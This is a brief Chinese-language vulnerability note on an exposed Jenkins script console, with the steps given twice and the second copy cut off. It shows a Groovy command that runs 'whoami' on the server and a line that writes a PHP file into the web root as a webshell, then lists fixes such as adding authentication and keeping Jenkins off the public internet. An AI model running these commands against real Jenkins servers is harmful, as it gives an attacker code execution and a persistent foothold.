1、访问http://www.xxx.com:8080/manage
2、点击脚本命令行
println "whoami".execute().text
3、漏洞利用,写入webshell
new File ("/var/www/html/shell.php").write('<?php phpinfo(); ?>');
4、修复建议
- 升级版本
- 添加认证、设置强密码复杂度及账号锁定
- 避免把Jenkins直接暴露在公网
1、访问http://www.xxx.com:8080/manage
2、点击脚本命令行
println "whoami".execute().text
3、漏洞利用,写入webshell
new File ("/var/www/html/shell.php").write('<?php phpinfo(); ?>');
4、修复建议